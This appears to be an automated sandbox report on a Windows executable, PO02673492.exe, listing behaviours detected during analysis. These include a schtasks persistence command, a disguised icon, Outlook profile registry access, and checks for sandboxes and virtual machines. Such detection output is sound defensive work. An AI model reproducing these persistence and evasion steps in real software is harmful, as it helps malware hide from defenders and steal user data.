                      Source: 8.0.MSBuild.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.MSBuild.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.MSBuild.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\PO02673492.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: PO02673492.exeStatic file information: File size 1127936 > 1048576
                      Source: PO02673492.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: PO02673492.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_0104FFA4 push cs; ret
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_01B2B15A push esp; ret
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_05C75148 push eax; rep ret
                      Source: C:\Users\user\Desktop\PO02673492.exeCode function: 0_2_05C78F17 push dword ptr [ebp-17000000h]; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0110B5FF push edi; retn 0000h
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0110D458 pushad ; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0110D44C pushad ; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.94405768333
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.94405768333
                      Source: C:\Users\user\Desktop\PO02673492.exeFile created: C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Icon mismatch, binary includes an icon from a different legit application in order to fool usersShow sources
                      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download5.png
                      Source: C:\Users\user\Desktop\PO02673492.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.PO02673492.exe.374a138.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO02673492.exe PID: 6900, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: PO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmp, PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: PO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmp, PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\PO02673492.exe TID: 6904Thread sleep time: -34820s >= -30000s
                      Source: C:\Users\user\Desktop\PO02673492.exe TID: 6904Thread sleep time: -65000s >= -30000s
                      Source: C:\Users\user\Desktop\PO02673492.exe TID: 6948Thread sleep time: -922337203685477s >= -30000s
